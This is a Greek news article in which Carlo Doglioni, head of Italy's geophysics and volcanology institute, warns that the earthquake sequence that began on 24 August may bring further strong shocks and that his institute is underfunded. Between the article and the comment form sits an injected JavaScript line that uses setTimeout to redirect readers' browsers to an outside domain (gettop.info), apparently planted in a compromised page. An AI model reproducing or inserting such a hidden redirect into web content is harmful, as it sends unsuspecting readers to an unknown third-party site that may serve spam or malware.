Ανήσυχος Ιταλός σεισμολόγος: Δεν τελειώσαμε με τους μεγάλους σεισμούς

0
7

 

«Η σεισμική δραστηριότητα που ξεκίνησε την 24η Αυγούστου μπορεί να διαρκέσει καιρό. Δεν μπορούμε να αποκλείσουμε άλλους σεισμούς μεγάλης έντασης» προειδοποίησε ο πρόεδρος του Ιταλικού Ινστιτούτου Γεωφυσικής και Ηφαιστειολογίας, Κάρλο Ντολιόνι.

Μιλώντας στα μέλη της Ένωσης Ξένων Ανταποκριτών της Ιταλίας, ο κ.Ντολιόνι τόνισε παράλληλα ότι «ο εφησυχασμός, κατά συνέπεια, μπορεί να αποδειχθεί πολύ επικίνδυνος».

Ο επικεφαλής του Ινστιτούτου Γεωφυσικής και Ηφαιστειολογίας υπενθύμισε ότι δεν μπορούν να γίνουν ασφαλείς προβλέψεις για τους σεισμούς.
Τόνισε ότι το 1703, στην περιοχή της κεντρικής Ιταλίας σημειώθηκαν δυο ισχυρές σεισμικές δονήσεις, ενώ μετά από μια διετία ο Εγκέλαδος χτύπησε και πάλι την περιοχή προκαλώντας τεράστιες καταστροφές.

Ο Ντολιόνι παράλληλα υπογράμμισε ότι το Ινστιτούτο του οποίου προΐσταται μετά βίας έχει τη δυνατότητα να καταβάλλει τους μισθούς των εργαζομένων του και να μπορεί καν να εγγυάται την συντήρηση του τεχνολογικού του εξοπλισμού, αφού ο ετήσιος προϋπολογισμός του δεν ξεπερνά τα 50 εκατομμύρια ευρώ.

  setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here